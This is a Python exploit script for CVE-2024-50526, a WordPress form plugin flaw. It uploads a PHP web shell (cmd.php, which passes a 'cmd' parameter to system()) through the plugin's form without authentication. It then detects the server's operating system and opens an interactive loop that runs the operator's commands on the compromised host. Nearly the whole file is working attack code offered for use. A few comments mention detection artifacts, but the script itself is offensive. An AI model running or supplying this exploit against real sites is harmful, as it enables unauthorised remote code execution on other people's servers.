import requests
import argparse
import time
# argparse configuration. Both flags are mandatory, so parse_args() below
# raises SystemExit with a usage message when either is missing; this runs
# at import time because the script has no main() guard.
parser = argparse.ArgumentParser(description="Script to upload a PHP file and enumerate final upload directory.")
parser.add_argument(
    "--target",
    type=str,
    required=True,
    help="The URL of the target form (e.g., http://localhost/wordpress_lab/mpmf-1/)."
)
# Exposed to the rest of the script as args.form_name (argparse maps the
# dash to an underscore).
parser.add_argument(
    "--form-name",
    type=str,
    required=True,
    help="The value of the form_id field (e.g., hkh)."
)
args = parser.parse_args()
def print_message(message, icon):
    """Write ``icon`` and ``message`` as one space-separated line, then pause.

    The 1.5 s pause paces the status output so consecutive lines are
    readable as they appear; it applies to every call of this helper.
    Returns None.
    """
    print(icon, message)
    time.sleep(1.5)  # pacing delay between status lines
# ASCII-art banner
def banner():
    """Print the tool's ASCII-art banner (CVE reference and author credit).

    The text is a raw string so the backslashes in the art are kept
    literally. Returns None.
    """
    art = r"""
_______ ________ ___ ____ ___ __ __ __________ _________ _____
/ ____/ | / / ____/ |__ \ / __ \__ \/ // / / ____/ __ \/ ____/__ \ / ___/
/ / | | / / __/________/ // / / /_/ / // /_______/___ \/ / / /___ \ __/ // __ \
/ /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/___/ / /_/ /___/ // __// /_/ /
\____/ |___/_____/ /____/\____/____/ /_/ /_____/\____/_____//____/\____/
0-click RCE (Unauthenticated / Pre-auth) Exploit for CVE-2024-50526
coded by @JoshuaProvoste (jp / kw0)
"""
    print(art)


banner()
# Endpoint URL and derived values
url = args.target
form_name = args.form_name
# Drop the last two path segments of --target and re-append "/"; the
# WordPress root is assumed to sit two levels above the form page.
base_url = args.target.rsplit("/", 2)[0] + "/"
# Request headers. Everything here is a fixed literal except Referer:
# Host and Origin are "localhost" regardless of --target, and the
# User-Agent mimics Firefox 132 on Windows.
headers = {
    "Host": "localhost",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Origin": "http://localhost",
    "DNT": "1",
    "Sec-GPC": "1",
    "Connection": "keep-alive",
    "Referer": url,
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1",
    "Priority": "u=0, i",
}
# Contents of the PHP file that gets uploaded. Requested without a cmd
# parameter it prints the OS name (consumed by the detection step below);
# with one, the value is handed to system().
# Detection note: the observable artifacts of this script are a .php file
# written under wp-content/uploads/mpmf_uploads/ and GET requests to it
# carrying a "cmd" query string — both show up in web-server logs and on
# disk. Mitigation lives server-side (the plugin's upload handling and
# whether PHP executes under wp-content/uploads); nothing here helps.
php_payload = """<?php
if (php_sapi_name() !== 'cli' && !isset($_GET['cmd'])) {
echo 'System OS: ' . php_uname('s');
}
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>"""
# Multipart body: the file travels in field "file1" under the name cmd.php.
files = {
    "file1": ("cmd.php", php_payload, "application/octet-stream"),
}
# Form fields sent alongside the file. Their meaning is not shown here;
# presumably they mirror what the plugin's own form posts — verify against
# the plugin before relying on them.
data = {
    "form_name": form_name,
    "field_label1": "",
    "countcalculated": "1",
    "count_files": "1",
    "count": "2",
    "mpmf_form_id": "1",
    "custom_form_action": "send_data",
    "send": "Submit",
}
# Submit the upload. Note that no timeout is set on any request in this
# script, so a silent server blocks it indefinitely.
response = requests.post(url, headers=headers, files=files, data=data)
# Report success or failure from the HTTP status alone.
if response.status_code == 200:
    print("[+] File upload successful!")
else:
    print(f"[-] File upload failed with status code {response.status_code}.")
# "Verification" step. NOTE: this block only re-reads the status of the
# upload response above; payload_url is built but never fetched here, so
# the RequestException handler cannot be reached from this block.
try:
    payload_url = f"{base_url}/wp-content/uploads/mpmf_uploads/cmd.php"
    print("[+] Verifying payload...")
    if response.status_code == 200:
        print(f"[+] Payload is accessible: {payload_url}")
    else:
        print("[-] Payload not found.")
except requests.RequestException as e:
    print(f"[-] Error while verifying payload: {e}")
print_message("Detecting operating system from the target...", "[+]")
# OS detection: fetch the uploaded file without a cmd parameter and look
# for "windows" / "linux" in the lower-cased body. A transport error ends
# the script with exit status 1 (exit() here is the site-provided builtin;
# sys is not imported).
try:
    payload_url = f"{base_url}/wp-content/uploads/mpmf_uploads/cmd.php"
    os_response = requests.get(payload_url).text.strip().lower()
    if "windows" in os_response:
        print_message("Detected OS: Windows (only Windows commands can be executed).", "[+]")
    elif "linux" in os_response:
        print_message("Detected OS: Linux (only Linux commands can be executed).", "[+]")
    else:
        print_message("Failed to detect operating system. Defaulting to generic commands.", "[-]")
except requests.exceptions.RequestException as e:
    print_message(f"Failed to detect operating system: {e}", "[-]")
    exit(1)
# Interactive loop: each line typed at the prompt is sent as the "cmd"
# query parameter of a GET to payload_url and the stripped response body
# is echoed. "exit" (case-insensitive) or Ctrl+C leaves the loop; a
# transport error on a single command is reported and the loop continues.
print_message("Entering interactive shell mode...\n", "[+]")
print("Type 'exit' or 'Ctrl+C' to leave.\n")
try:
    while True:
        command = input("shell> ")
        if command.lower() == "exit":
            print_message("Exiting interactive shell.", "[+]")
            break
        # Send the command to the uploaded file
        try:
            payload_url = f"{base_url}/wp-content/uploads/mpmf_uploads/cmd.php"
            get_response = requests.get(payload_url, params={"cmd": command})
            if get_response.status_code == 200:
                if get_response.text.strip():
                    print(get_response.text.strip())  # Show the command output when it is non-empty
                else:
                    print_message("Command executed, but no output was returned.", "[+]")
            else:
                print_message(f"Command execution failed. HTTP Status: {get_response.status_code}", "[-]")
        except requests.exceptions.RequestException as e:
            print_message(f"Error during command execution: {e}", "[-]")
except KeyboardInterrupt:
    print("\nKeyboard interrupt detected. Exiting interactive shell.")